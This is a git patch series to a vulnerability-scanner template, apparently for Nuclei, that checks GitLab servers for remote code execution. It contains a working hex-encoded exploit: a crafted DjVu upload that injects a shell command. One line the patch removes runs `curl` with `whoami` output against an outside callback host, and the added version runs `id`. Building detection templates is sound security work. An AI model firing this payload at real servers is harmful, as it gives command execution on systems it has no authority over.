From 86c55d0cbe53368fd9baac498deddf15e6f52486 Mon Sep 17 00:00:00 2001 From: "Greg Johnson (codeEmitter)" Date: Thu, 17 Feb 2022 12:43:55 -0500 Subject: [PATCH 1/4] remove interactsh from the gitlab-rce template --- vulnerabilities/gitlab/gitlab-rce.yaml | 14 ++------------ 1 file changed, 2 insertions(+), 12 deletions(-) diff --git a/vulnerabilities/gitlab/gitlab-rce.yaml b/vulnerabilities/gitlab/gitlab-rce.yaml index ba59736e86..b1934b1588 100644 --- a/vulnerabilities/gitlab/gitlab-rce.yaml +++ b/vulnerabilities/gitlab/gitlab-rce.yaml @@ -29,20 +29,16 @@ requests: Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5 X-CSRF-Token: {{csrf-token}} - {{hex_decode('0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358350D0A436F6E74656E742D446973706F736974696F6E3A20666F726D2D646174613B206E616D653D2266696C65223B2066696C656E616D653D22746573742E6A7067220D0A436F6E74656E742D547970653A20696D6167652F6A7065670D0A0D0A41542654464F524D000003AF444A564D4449524D0000002E81000200000046000000ACFFFFDEBF992021C8914EEB0C071FD2DA88E86BE6440F2C7102EE49D36E95BDA2C3223F464F524D0000005E444A5655494E464F0000000A00080008180064001600494E434C0000000F7368617265645F616E6E6F2E696666004247343400000011004A0102000800088AE6E1B137D97F2A89004247343400000004010FF99F4247343400000002020A464F524D00000307444A5649414E546100000150286D657461646174610A0928436F7079726967687420225C0A22202E2071787B')}}curl `whoami`.{{interactsh-url}}{{hex_decode('7D202E205C0A2220622022292029202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358352D2D0D0A')}} + {{hex_decode('0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358350D0A436F6E74656E742D446973706F736974696F6E3A20666F726D2D646174613B206E616D653D2266696C65223B2066696C656E616D653D22746573742E6A7067220D0A436F6E74656E742D547970653A20696D6167652F6A7065670D0A0D0A41542654464F524D000003AF444A564D4449524D0000002E81000200000046000000ACFFFFDEBF992021C8914EEB0C071FD2DA88E86BE6440F2C7102EE49D36E95BDA2C3223F464F524D0000005E444A5655494E464F0000000A00080008180064001600494E434C0000000F7368617265645F616E6E6F2E696666004247343400000011004A0102000800088AE6E1B137D97F2A89004247343400000004010FF99F4247343400000002020A464F524D00000307444A5649414E546100000150286D657461646174610A0928436F7079726967687420225C0A22202E2071787B')}}id{{hex_decode('7D202E205C0A2220622022292029202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358352D2D0D0A')}} cookie-reuse: true + max-redirects: 3 matchers-condition: and matchers: - type: word words: - 'Failed to process image' - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - "dns" - - type: status status: - 422 @@ -55,9 +51,3 @@ requests: regex: - 'csrf-token" content="(.*?)" />\n\n Date: Thu, 17 Feb 2022 15:36:17 -0500 Subject: [PATCH 2/4] fix linting error --- vulnerabilities/gitlab/gitlab-rce.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/vulnerabilities/gitlab/gitlab-rce.yaml b/vulnerabilities/gitlab/gitlab-rce.yaml index b1934b1588..908240c7d6 100644 --- a/vulnerabilities/gitlab/gitlab-rce.yaml +++ b/vulnerabilities/gitlab/gitlab-rce.yaml @@ -50,4 +50,3 @@ requests: group: 1 regex: - 'csrf-token" content="(.*?)" />\n\n Date: Thu, 17 Feb 2022 16:26:19 -0500 Subject: [PATCH 3/4] new versions of gitlab do not have a blank in between the anti-csrf meta tag --- vulnerabilities/gitlab/gitlab-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/gitlab/gitlab-rce.yaml b/vulnerabilities/gitlab/gitlab-rce.yaml index 908240c7d6..2bfd6e94d1 100644 --- a/vulnerabilities/gitlab/gitlab-rce.yaml +++ b/vulnerabilities/gitlab/gitlab-rce.yaml @@ -49,4 +49,4 @@ requests: internal: true group: 1 regex: - - 'csrf-token" content="(.*?)" />\n\n'